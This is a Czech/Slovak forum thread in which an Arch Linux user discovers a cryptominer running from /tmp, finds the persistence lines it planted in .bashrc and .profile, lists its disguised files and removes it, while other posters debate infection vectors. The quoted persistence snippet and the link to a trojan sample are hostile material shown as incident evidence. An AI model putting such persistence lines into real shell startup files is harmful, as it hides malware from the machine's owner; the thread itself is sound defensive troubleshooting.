Fórum Root.cz
Hlavní témata => Server => Téma založeno: j 27. 08. 2018, 17:15:35
-
dnes som si nahodou vo vystupe htop vsimol proces, ktory zral 100 % cpu. podivny bol jeho nazov: /tmp/F441-D751-2188-F374/initctl. velkost 2492 kB a vo vnutri retazec GCC (Ubuntu 6.4.0-8ubuntu1). nakolko bezim na archu, vacsinu veci kompilujem, zacinal som mat zle tusenie.
vo vystupe lsof sa objavila takyto zaznam:
.. TCP mypc:42454->100.ip-142-44-242.net:14444 (ESTABLISHED)
spustil som teda tcpdump:
100.ip-142-44-242.net.14444 -> mypc.42454 {"jsonrpc":"2.0","method":"job","params":{"blob":"0707f..
Podla googlu to vyzera na nejaky kryptominer. Preventivne som odpojil PC od netu, kazdopadne ostava viacero otazok:
- ako som sa nakazil?
- co je vsetko kompromitovane?
- ako sa nakazy zbavit?
budem vdacny za kazdu radu. arch linux, 64bit.
j
-
pod akym userom to bezalo/kto je vlastnikom suboru?
-
Jak si se nakazil je tezke rict bez logu a ty logy uz nemusi byt validni. Patrne nejaky otevreny port a nejaka zranitelnost. Co vse je kompromitovane? Tezko rict, obecne receno vse. Jak se toho zbavit? Cista instalace a obnova uzivatelskych dat ze zalohy je nejlepsi volba. Nevis co vse je napadene.
-
nakažení linuxu není kupodivu tak složité, za vším hledej prohlížeč, přes ně se spustil kód, který třeba nemusel dělat nic jiného než čekat až se v nějakém terminálu přihlásíš jako root. Nebo klidně ani nemusel potřebovat roota, prostě si vlezl do .bashrc a odtud se spouštěl a těžil. Pokud to nebyl prohlížeč, tak ti někdo kazil router a ten zase nakazil sebe, protože jak to bývá u domácích počítačů, FW není potřeba...
To ale pouze střílím, k přesným závěrům je potřeba bitová kopie disku a dump paměti.
Smaž to a jdi znovu, nebo si začni prohledávat tempy a hledat kudy ten program se mohl někam dostat.
-
nakažení linuxu není kupodivu tak složité, za vším hledej prohlížeč, přes ně se spustil kód,
Opravdu? Jak je možné v prohlížeči jen tak spustit libovolný kód?
který třeba nemusel dělat nic jiného než čekat až se v nějakém terminálu přihlásíš jako root
Dejme tomu, že by dokázal zjistit, že se v nějakém terminálu přihlásil jako root. A co by ten kód spuštěný pod běžným uživatelem dál dělal? Jak by ovlivnil ten rootovský proces?
Pokud to nebyl prohlížeč, tak ti někdo kazil router a ten zase nakazil sebe
Jak router jen tak nakazil počítač v síti? Nejsnáz asi kapénkovou infekcí…
To ale pouze střílím
To je to jediné, s čím se dá souhlasit.
-
tak nieco sa podarilo zistit. proces bezi pod mojim userom. a vyzera to na https://www.reddit.com/r/linuxmasterrace/comments/8dx7nj/psa_please_check_if/. blbe je, ze aj ked som .desktop subor zmazal, objavil sa (po reboote) v /tmp novy proces. je skratka celkom odolny. nakazil som sa niekedy koncom aprila, co celkom dobre ilustruje aj graf teploty cpu (monitorix) - nakolko aj pri "idle" skocil o 10 stupnov hore.
dakujem za komenty. ked zistim viac, pridam. j
-
Dejme tomu, že by dokázal zjistit, že se v nějakém terminálu přihlásil jako root. A co by ten kód spuštěný pod běžným uživatelem dál dělal? Jak by ovlivnil ten rootovský proces?
Skodlivy kod behici pod userem je dost pruser, muze cist .ssh, zasifrovat dokumenty, měnit PATH, atd. A ono je to jedno, díky neexistující izolaci u X11 může kterákoliv aplikace naslouhat stistky kláves jiné. Takže tomu procesu staci az nekdo natuka heslo do terminalu a je to.
Bezpečnostní model linuxu byl vymýšlen v osmdesátých letech a v dnešním světě je to katastrofa. Modlim se za flatpack a Wayland.
-
hmm... tak v .bashrc mam takyto skvost:
linux_bash="$HOME/.ssh/service/ssh-agent"
if [ -e "$linux_bash" ];then
setsid "$linux_bash" 2>&1 & disown
fi
a v .profile pre istotu este raz ale trochu inak:
linux_bash="$HOME/.cache/totem/service/totem-daemon"
if [ -e "$linux_bash" ];then
setsid "$linux_bash" 2>&1 & disown
fi
uz na nete nachadzam k tejto teme celkom dost prispevkov..
-
a kde vsade sa nas..
$ sudo find ~myuser -size 2227632c
/home/myuser/.local/share/accounts/services/dbus-daemon
/home/myuser/.local/share/icc/icc-daemon
/home/myuser/.cache/totem/service/totem-daemon
/home/myuser/.ssh/service/ssh-agent
-
a keby sa s tym chcel niekto hrat: https://github.com/Saren-Arterius/dbus-daemon-trojan-sample
akurat premyslam, ci sa to tu spominalo v Postrehoch z bezpecnosti
-
nakažení linuxu není kupodivu tak složité, za vším hledej prohlížeč, přes ně se spustil kód, který třeba nemusel dělat nic jiného než čekat až se v nějakém terminálu přihlásíš jako root. Nebo klidně ani nemusel potřebovat roota, prostě si vlezl do .bashrc a odtud se spouštěl a těžil. Pokud to nebyl prohlížeč, tak ti někdo kazil router a ten zase nakazil sebe, protože jak to bývá u domácích počítačů, FW není potřeba...
To ale pouze střílím, k přesným závěrům je potřeba bitová kopie disku a dump paměti.
Smaž to a jdi znovu, nebo si začni prohledávat tempy a hledat kudy ten program se mohl někam dostat.
Píšete blbosti, bylo vyvedeno dost úsilí aby někdo nemohl jen tak spustit libovolný kod po navštívení webove stranky. A i pokud mate otevreny port, stale potrebujete něco co na něm poslouchá s nějakou zranitelností, která nebyla patchnuta.
Jinak na webu se píše, že byl nakažený nějaký plugin pro přehrávač na Archu (Kodi), to mi spíš příjde jako rozumný attack vector.
-
Skodlivy kod behici pod userem je dost pruser
To nezpochybňuju. Jenže AoK se v tom komentáři nedostal ani k tomu. Tam to bylo samé 1. prohlížeč 2. ? 3. průnik nebo 1. uživatelský proces 2. ? 3. root.
-
RHEL defaultne montuje /tmp s noexec flagem, divim se,zeje to jinde jinak.
-
Dejme tomu, že by dokázal zjistit, že se v nějakém terminálu přihlásil jako root. A co by ten kód spuštěný pod běžným uživatelem dál dělal? Jak by ovlivnil ten rootovský proces?
Skodlivy kod behici pod userem je dost pruser, muze cist .ssh, zasifrovat dokumenty, měnit PATH, atd. A ono je to jedno, díky neexistující izolaci u X11 může kterákoliv aplikace naslouhat stistky kláves jiné. Takže tomu procesu staci az nekdo natuka heslo do terminalu a je to.
Bezpečnostní model linuxu byl vymýšlen v osmdesátých letech a v dnešním světě je to katastrofa. Modlim se za flatpack a Wayland.
Selinux, Apparmor a CGroups byly vymyslene v osmdesatkach? To jsem nevedel
-
To akoze linux este furt nespusta aplikacie v sandboxe a akakolvek derava apka moze kompromitovat cele ~ ? Ze vas to bavi sa hrat s ohnom a este mat reci o nasadeni linux desktopu vo firmach...
-
Tak v korporatu se o to někdo stara, ktery má k dispozici výše zminěný apparmor a selinux což jsou mocné nástroje pro administraci. Tam user nic neinstaluje.
Ale pro vlastní desktop je to vskutku bída. Existence X11 je jeden velký privilege escalation. UAC už má 10 let a tady je stále konvenční způsob přihlašování psát heslo do obyčejného okna. Zatím jsem neviděl seriozni personal firewall. A samozřejmě, návyky kopírovat nezname prikazy do su terminalu, které si každý nováček rychle udělá, také nepomáhají.
-
Opravdu? Jak je možné v prohlížeči jen tak spustit libovolný kód?
Kupodivu stačí neaktualizovat prohlížeč, i po roce už může být docela průser, zranitelností přes JS či média bylo v historii několik. Na up to date prohlížeči už tak samozřejmě tak snadné není.
Dejme tomu, že by dokázal zjistit, že se v nějakém terminálu přihlásil jako root. A co by ten kód spuštěný pod běžným uživatelem dál dělal? Jak by ovlivnil ten rootovský proces?
ve většině případů stačí sledovat titulek okna a hledat sudo, lze pak do bash procesu pod rootem poslat svůj obsah.
Jak router jen tak nakazil počítač v síti? Nejsnáz asi kapénkovou infekcí…
Ne jen tak, musíš tam mít otevřenou nezabezpečenou službu nebo může páchat mitm, to se ale rychle prozradí.
Píšete blbosti, bylo vyvedeno dost úsilí aby někdo nemohl jen tak spustit libovolný kod po navštívení webove stranky. A i pokud mate otevreny port, stale potrebujete něco co na něm poslouchá s nějakou zranitelností, která nebyla patchnuta.
Jinak na webu se píše, že byl nakažený nějaký plugin pro přehrávač na Archu (Kodi), to mi spíš příjde jako rozumný attack vector.
Pro dlouho neaktualizované prohlížeče takových stránek je poměrně velké množství. Je ale obtížné tě na takovou stránku dostat, to ano, neaktualizovaný prohlížeč je ale častý vej.
Ano, musí tam být běžící služba, nebo se může páchat mitm třeba na stahování balíčků, pacman ale používá gpg a tady bych problém neviděl.
Pokud se jedná o Kodi, dobře. Zranitelnost může udělat jakákoliv spuštěná aplikace.
-
tenhle zmetek nevypadá nijak nebezpečně, standadní program, ani se nesnaží nijak moc maskovat
totem-daemon: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=9f048c5a172c22779466986ce41a77f98c3f0282, stripped
linux-vdso.so.1 => (0x00007ffeda73f000)
libpthread.so.0 => /lib64/libpthread.so.0 (0x00007fe89362e000)
libm.so.6 => /lib64/libm.so.6 (0x00007fe89332b000)
libc.so.6 => /lib64/libc.so.6 (0x00007fe892f6a000)
/lib64/ld-linux-x86-64.so.2 (0x000055c932c9d000)
zapisuje do těhle souborů, aplikaci na těžbu si stahuje ze serverů z OVH, adresu má přímo v sobě a očividně běhá na netu více verzí, jak se adresa postupně měnila.
/home/aok/.bash_logout
/home/aok/.bash_profile
/home/aok/.bashrc
/home/aok/.cache/totem/service/.totem-daemon.bin
/home/aok/.cache/totem/service/.totem-daemon.log
/home/aok/.cache/totem/service/.totem-daemon.sys
/home/aok/.cache/totem/service/totem-daemon
/home/aok/.config/autostart/dbus-daemon.desktop
/home/aok/.local/share/accounts/services/.dbus-daemon.bin
/home/aok/.local/share/accounts/services/.dbus-daemon.log
/home/aok/.local/share/accounts/services/.dbus-daemon.sys
/home/aok/.local/share/accounts/services/.zeitgeist-fts.sys
/home/aok/.local/share/accounts/services/dbus-daemon
/home/aok/.local/share/accounts/services/zeitgeist-fts
/home/aok/.local/share/icc
/home/aok/.local/share/icc/.icc-daemon.bin
/home/aok/.local/share/icc/.icc-daemon.log
/home/aok/.local/share/icc/.icc-daemon.sys
/home/aok/.profile
/home/aok/.ssh/service/.ssh-agent.bin
/home/aok/.ssh/service/.ssh-agent.log
/home/aok/.ssh/service/.ssh-agent.sys
/home/aok/.ssh/service/ssh-agent
Aplikaci do /tmp stahuje po spuštění, není perzistentní, k jeho odstranění by mělo stačit odstranit a upravit soubory výše. Avšak nikdy si ale nemůžeš být jistý co jiného tam máš a co jiného tam běží
-
dakujem vsetkym. odstranil som vsetky binarky a skripty, /tmp odteraz mountujem s noexecom (arch linux sa tvari, ze niekedy s tym moze mat makepkg problem, ale zatial som nenarazil) a skontroloval som subory pomocou checksum ulozenych v metadatach balikov. z kodi som vyhadzal vsetky addony, na SELinux si netrufam. teplota cpu sa zase vracia k normalu: https://imgur.com/cb5iFGO
inak podozrivy subor uz deteguje aj zopar antivirov: https://www.virustotal.com/#/file/2793e661318e1d4919b1d3d9d32c8164f036ab825eb84df89f7ae921910b180f/detection